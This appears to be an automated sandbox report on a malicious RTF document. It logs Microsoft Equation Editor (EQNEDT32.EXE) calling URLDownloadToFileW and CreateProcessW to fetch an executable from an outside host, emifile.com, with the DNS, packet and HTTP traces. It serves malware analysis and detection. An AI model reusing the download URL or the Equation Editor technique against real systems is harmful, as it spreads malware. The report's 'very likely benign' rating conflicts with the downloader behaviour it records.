Reputation:	moderate, very likely benign file

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
emifile.com	178.128.90.174	true	false	4%, virustotal, Browse	low

Contacted URLs

Name	Process
http://emifile.com/frak/obai/okbimnanna.exe	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
178.128.90.174	Greece		1241	FORTHNET-GRForthnetGR	false

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	3.2192086982578436
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	LyTaZHwHpG.rtf
File size:	9388
MD5:	15a43d4c8ae9592ee06a410c58311e35
SHA1:	8e1ab5ddc917da3689818af3ae61d646f6a6bcab
SHA256:	da29f37ec139b87d9dcee92156af4882a1c7312e8ad54ca0912c360d4ea2f362
SHA512:	a8d73d5ea36a3269e1428a6b9ce26855fd8e2fc1fbfb4048499bcdd33ccde0818ccbcffedd82eba8a39585263f775ef8cca08b03dbbd3ca0eecffc4199277895
File Content Preview:	{\rtf{\object\objhtml\objupdate\objw3118\objh1589{\*\objdata 359c4439020000001600000049666c6359686b4375743948465639587a7a31457600000000000000000000120000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001000000010000

File Icon

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2018 20:44:40.464725018 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 6, 2018 20:44:41.461369038 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 6, 2018 20:44:42.465666056 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 6, 2018 20:44:43.803042889 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 6, 2018 20:44:43.817900896 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.065350056 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.065531015 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.066184998 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.313595057 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.764895916 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.764967918 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765023947 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765105009 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.765124083 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765182018 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765284061 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765285969 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.765331984 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765377045 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765419006 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.765448093 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.765460014 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:44.766760111 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:44.891741991 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 6, 2018 20:44:45.013067961 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013103962 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013111115 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.013129950 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013205051 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.013298035 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013313055 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013339996 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.013453960 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.013627052 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013655901 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013679981 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013704062 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013725996 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013734102 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.013782024 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013807058 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013834000 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013851881 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013875008 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013876915 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.013900042 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.013971090 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.260566950 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260597944 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260632992 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.260684967 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260718107 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260740042 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.260740995 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260763884 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260787964 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260812044 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260890007 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.260890007 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260915041 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260937929 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260960102 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.260981083 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261001110 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261013031 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261038065 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261053085 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261073112 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261076927 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261095047 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261100054 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261125088 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261146069 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261168957 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261204004 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261225939 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261228085 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261250973 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261272907 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261295080 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261317015 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261327982 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261374950 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261400938 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261418104 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261450052 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261545897 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261549950 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261575937 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261600018 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261621952 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261643887 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261646032 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.261670113 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261693001 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.261737108 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.508428097 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.508459091 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.508486032 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.508506060 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.508574009 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.508650064 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.508764982 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.508824110 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:45.508886099 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:45.806274891 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 6, 2018 20:44:45.894550085 CEST	49163	80	192.168.2.2	178.128.90.174
Aug 6, 2018 20:44:46.401756048 CEST	80	49163	178.128.90.174	192.168.2.2
Aug 6, 2018 20:44:46.401817083 CEST	49163	80	192.168.2.2	178.128.90.174

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2018 20:44:40.464725018 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 6, 2018 20:44:41.461369038 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 6, 2018 20:44:42.465666056 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 6, 2018 20:44:43.803042889 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 6, 2018 20:44:44.891741991 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 6, 2018 20:44:45.806274891 CEST	53	56842	8.8.8.8	192.168.2.2

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 6, 2018 20:44:44.891819000 CEST	192.168.2.2	8.8.8.8	cffd	(Port unreachable)	Destination Unreachable
Aug 6, 2018 20:44:45.806355000 CEST	192.168.2.2	8.8.8.8	cffd	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 6, 2018 20:44:40.464725018 CEST	192.168.2.2	8.8.8.8	0x614a	Standard query (0)	emifile.com	A (IP address)	IN (0x0001)
Aug 6, 2018 20:44:41.461369038 CEST	192.168.2.2	8.8.8.8	0x614a	Standard query (0)	emifile.com	A (IP address)	IN (0x0001)
Aug 6, 2018 20:44:42.465666056 CEST	192.168.2.2	8.8.8.8	0x614a	Standard query (0)	emifile.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Aug 6, 2018 20:44:43.803042889 CEST	8.8.8.8	192.168.2.2	0x614a	No error (0)	emifile.com	178.128.90.174	A (IP address)	IN (0x0001)
Aug 6, 2018 20:44:44.891741991 CEST	8.8.8.8	192.168.2.2	0x614a	No error (0)	emifile.com	178.128.90.174	A (IP address)	IN (0x0001)
Aug 6, 2018 20:44:45.806274891 CEST	8.8.8.8	192.168.2.2	0x614a	No error (0)	emifile.com	178.128.90.174	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

emifile.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49163	178.128.90.174	80	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 6, 2018 20:44:44.066184998 CEST	0	OUT	GET /frak/obai/okbimnanna.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: emifile.com Connection: Keep-Alive
Aug 6, 2018 20:44:44.764895916 CEST	2	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Aug 2018 18:44:44 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.45 X-Powered-By: PHP/5.4.45 Set-Cookie: PHPSESSID=pnss6f6ai8njn59f4ml35u8cd0; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: default=022d24ecdc771ed8b19a863639; path=/; httponly Set-Cookie: language=en-gb; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.com Set-Cookie: currency=MYR; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.com Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 32 62 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 6d 69 66 69 6c 65 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 Data Ascii: 2b0c5<!DOCTYPE html><html dir="ltr" lang="en"><head><meta charset="UTF-8" /><link href='https://fonts.gstatic.com' rel='preconnect' crossorigin /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"><title>The page you requested cannot be found!</title><base href="http://emifile.com/" target="_self" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="gener
Aug 6, 2018 20:44:44.764967918 CEST	3	IN	Data Raw: 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 63 68 6e 6f 70 6f 6c 69 73 20 28 66 75 6c 6c 20 77 69 64 74 68 29 20 31 2e 30 2e 31 2f 42 75 72 6e 45 6e 67 69 6e 65 20 31 2e 32 2e 36 2f 4f 43 20 32 2e 33 2e 30 2e 32 2f 50 48 50 20 35 2e 34 2e Data Ascii: ator" content="Technopolis (full width) 1.0.1/BurnEngine 1.2.6/OC 2.3.0.2/PHP 5.4.45" /><link href="http://emifile.com/image/catalog/cart.png" rel="icon" /><link href="//fonts.googleapis.com/css?family=Open+Sans:700italic,700,600italic,600,i
Aug 6, 2018 20:44:44.765023947 CEST	4	IN	Data Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 6d 69 66 69 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 2f 63 61 63 68 65 2f 74 62 2f 69 65 39 5f 6d 61 69 6e 5f Data Ascii: rel="stylesheet" type="text/css" href="http://emifile.com/image/cache/tb/ie9_main_4.ltr.0.726ee.css?id=61589830d303c3a56c3360ef9fe722e2" media="all" /><link rel="stylesheet" type="text/css" href="http://emifile.com/image/cache/tb/dynamic.23aa
Aug 6, 2018 20:44:44.765124083 CEST	5	IN	Data Raw: 22 5c 2f 74 62 5c 2f 6d 61 78 69 6d 75 6d 5f 77 69 64 74 68 22 3a 31 34 30 30 2c 22 5c 2f 74 62 5c 2f 6d 73 67 5f 70 6f 73 69 74 69 6f 6e 22 3a 22 74 6f 70 52 69 67 68 74 22 2c 22 5c 2f 74 62 5c 2f 6d 73 67 5f 73 74 61 63 6b 22 3a 22 31 22 2c 22 Data Ascii: "\/tb\/maximum_width":1400,"\/tb\/msg_position":"topRight","\/tb\/msg_stack":"1","\/tb\/msg_timeout":"400000","\/lang\/text_failure":"Failure","\/lang\/text_continue":"Continue","\/lang\/text_continue_shopping":"Continue shopping","\/lang\/tex
Aug 6, 2018 20:44:44.765182018 CEST	6	IN	Data Raw: 75 72 6e 45 6e 67 69 6e 65 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 36 38 31 35 38 37 38 31 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a Data Ascii: urnEngine/javascript/jquery-migrate.min.js?681587811"></script><script src="http://emifile.com/catalog/view/theme/BurnEngine/javascript/bootstrap.min.js?1535542348"></script><script src="http://emifile.com/catalog/view/theme/BurnEngine/javas
Aug 6, 2018 20:44:44.765284061 CEST	7	IN	Data Raw: 6a 73 2c 66 6a 73 29 3b 7d 28 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 66 61 63 65 62 6f 6f 6b 2d 6a 73 73 64 6b 27 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d Data Ascii: js,fjs);}(document,'script','facebook-jssdk'));</script><div id="wrapper" class="container-fluid"> <script type="text/javascript" data-capture="0"> window.tb_wishlist_label = 'Wish List (0)'; </scr
Aug 6, 2018 20:44:44.765331984 CEST	9	IN	Data Raw: 53 68 6f 77 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 62 5f 67 75 74 5f 78 73 5f 30 20 74 62 5f 67 75 74 5f 73 6d 5f 30 20 74 62 5f 67 75 74 5f 6d 64 5f 30 20 74 62 5f 67 75 74 5f 6c 67 5f 30 22 3e 0a 20 20 20 20 20 20 20 Data Ascii: Show"> <div class="row tb_gut_xs_0 tb_gut_sm_0 tb_gut_md_0 tb_gut_lg_0"> <div class="col_nwfbv col col-xs-12 col-sm-auto col-md-auto col-lg-3 col-align-center col-valign-middle pos-sm-1 tb_pt_0 tb_pr_0 tb_pb_0 tb_pl_0"><div id="Heade
Aug 6, 2018 20:44:44.765377045 CEST	10	IN	Data Raw: 65 6e 75 20 74 62 4d 61 69 6e 4e 61 76 69 67 61 74 69 6f 6e 20 74 62 53 74 69 63 6b 79 53 68 6f 77 20 74 62 53 74 69 63 6b 79 50 6f 73 69 74 69 6f 6e 2d 33 20 74 62 53 74 69 63 6b 79 46 69 6c 6c 20 74 62 4d 6f 62 69 6c 65 4d 65 6e 75 53 68 6f 77 Data Ascii: enu tbMainNavigation tbStickyShow tbStickyPosition-3 tbStickyFill tbMobileMenuShow tbMobileMenuDisplayBlock tbMobilePosition-2 tb_mr_40 display-inline-block"><nav> <ul class="nav nav-horizontal nav-responsive" data-relative_to="content">
Aug 6, 2018 20:44:44.765419006 CEST	11	IN	Data Raw: 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 74 62 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 6d 69 66 69 6c 65 2e 63 6f 6d 2f 69 Data Ascii: li> <li class="tb_link"><a href="http://emifile.com/index.php?route=product/manufacturer/info&manufacturer_id=48">3Rex</a></li> </ul> </div> <div class
Aug 6, 2018 20:44:44.765460014 CEST	12	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 74 62 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 6d 69 66 69 6c 65 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 3f 72 6f 75 74 Data Ascii: <li class="tb_link"><a href="http://emifile.com/index.php?route=product/manufacturer/info&manufacturer_id=211">Ah Huat</a></li> <li class="tb_link"><a href="http://emifile.com/index.php?rout
Aug 6, 2018 20:44:45.013067961 CEST	14	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 74 62 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 6d 69 66 69 6c 65 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 3f 72 6f 75 74 65 3d 70 72 6f 64 75 63 74 2f Data Ascii: <li class="tb_link"><a href="http://emifile.com/index.php?route=product/manufacturer/info&manufacturer_id=280">Anda</a></li> <li class="tb_link"><a href="http://emifile.com/index.php?route=product/man

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3452 Parent PID: 3024

General

Start time:	20:44:44
Start date:	06/08/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\LyTaZHwHpG.rtf
Imagebase:	0x2fad0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3500 Parent PID: 548

General

Start time:	20:44:46
Start date:	06/08/2018
Path:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3708 Parent PID: 548

General

Start time:	20:45:03
Start date:	06/08/2018
Path:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: EQNEDT32.EXE PID: 3500 Parent PID: 548

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 006913E6, Relevance: 6.1, APIs: 4, Instructions: 81
processlibrarynetwork

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 0069146C
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0069148D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006914CA
ExitProcess.KERNEL32(00000000), ref: 006914DA

Memory Dump Source

Source File: 00000002.00000002.21013342670.0066D000.00000004.sdmp, Offset: 0066D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d000_EQNEDT32.jbxd

Function 006914DC, Relevance: .0, Instructions: 17

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.21013342670.0066D000.00000004.sdmp, Offset: 0066D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d000_EQNEDT32.jbxd

Non-executed Functions

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Exploits:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 3452 Parent PID: 3024

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3500 Parent PID: 548

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3708 Parent PID: 548

Function 006913E6, Relevance: 6.1, APIs: 4, Instructions: 81
processlibrarynetwork